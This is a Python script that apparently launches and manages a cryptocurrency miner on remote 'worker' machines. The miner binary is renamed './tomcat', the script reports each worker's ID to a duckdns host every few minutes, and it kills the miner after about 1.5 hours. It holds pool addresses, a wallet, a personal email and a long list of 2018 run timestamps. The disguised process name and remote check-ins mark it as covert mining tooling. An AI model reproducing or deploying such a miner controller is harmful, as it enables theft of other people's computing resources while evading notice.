import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:02.018672
#2018-02-17 16:24:07.502249
#2018-02-17 18:12:01.256086
#2018-02-17 19:59:06.163310
#2018-02-17 21:47:04.959562
#2018-02-17 23:32:07.046604
#2018-02-18 01:21:05.296684
#2018-02-18 03:08:04.157403
#2018-02-18 04:55:04.086296
#2018-02-18 06:46:04.051699
#2018-02-18 08:36:05.843360
#2018-02-18 10:22:03.995035
#2018-02-18 12:08:04.188149
#2018-02-18 13:53:05.747124
#2018-02-18 15:44:04.939108
#2018-02-18 17:34:05.741097
#2018-02-18 19:22:06.310872
#2018-02-18 21:08:03.594565
#2018-02-18 22:55:07.115060
#2018-02-19 00:43:01.516969
#2018-02-19 02:29:05.380186
#2018-02-19 04:16:06.623325
#2018-02-19 05:59:04.363736
#2018-02-19 07:48:04.616140
#2018-02-19 09:40:05.587359
#2018-02-19 11:28:04.243237
#2018-02-19 13:14:06.003397
#2018-02-19 15:03:07.390013
#2018-02-19 16:52:01.284436
#2018-02-19 18:40:08.623231
#2018-02-19 20:27:01.738383
#2018-02-19 22:16:06.559780
#2018-02-20 00:03:06.698037
#2018-02-20 01:50:04.663137
#2018-02-20 03:38:07.363835
#2018-02-20 05:23:07.357404
#2018-02-20 07:08:08.805334
#2018-02-20 08:54:07.879116
#2018-02-20 10:38:04.985477
#2018-02-20 12:24:06.605713
#2018-02-20 14:12:01.824374
#2018-02-20 15:56:13.033081
#2018-02-20 17:44:05.011172
#2018-02-20 19:36:05.247782
#2018-02-20 21:22:05.921458
#2018-02-20 23:08:06.924404
#2018-02-21 00:53:01.871458
#2018-02-21 02:38:01.292107
#2018-02-21 04:27:03.638112
#2018-02-21 06:15:10.128754
#2018-02-21 08:01:09.988703
#2018-02-21 09:46:07.134874
#2018-02-21 11:34:08.195143
#2018-02-21 13:23:02.173082
#2018-02-21 15:08:09.818921
#2018-02-21 16:57:01.238927
#2018-02-21 18:45:11.600169
#2018-02-21 20:36:04.799004
#2018-02-21 22:22:08.583666
#2018-02-22 00:11:06.358279
#2018-02-22 01:59:07.458683
#2018-02-22 03:45:09.467109
#2018-02-22 05:33:05.495800
#2018-02-22 07:18:04.694753
#2018-02-22 09:05:08.438155
#2018-02-22 10:53:09.593347
#2018-02-22 12:39:08.123870
#2018-02-22 14:24:04.808367
#2018-02-22 16:11:06.714330
#2018-02-22 17:56:10.482383
#2018-02-22 19:44:04.010856
#2018-02-22 21:34:08.670890
#2018-02-22 23:21:01.304666
#2018-02-23 01:07:05.019145
#2018-02-23 02:53:07.282458
#2018-02-23 04:41:01.250854
#2018-02-23 06:26:07.957131
#2018-02-23 08:14:04.319457
#2018-02-23 10:29:03.988336
#2018-02-23 12:23:01.572713
#2018-02-23 14:12:04.626362
#2018-02-23 16:02:04.134502
#2018-02-23 17:47:10.166980
#2018-02-23 19:35:09.823458
#2018-02-23 21:19:01.371008
#2018-02-23 23:06:06.698020
#2018-02-24 00:52:05.559162
#2018-02-24 02:47:07.121331
#2018-02-24 04:38:03.993076
#2018-02-24 06:22:07.328755
#2018-02-24 08:10:08.301289
#2018-02-24 09:55:09.438371
#2018-02-24 11:49:05.667344
#2018-02-24 13:41:03.893641
#2018-02-24 15:28:01.602705
#2018-02-24 17:17:04.757659
#2018-02-24 19:09:01.533266
#2018-02-24 20:57:05.988895
#2018-02-24 23:24:05.806024
#2018-02-25 02:49:01.317229
#2018-02-25 06:29:04.990050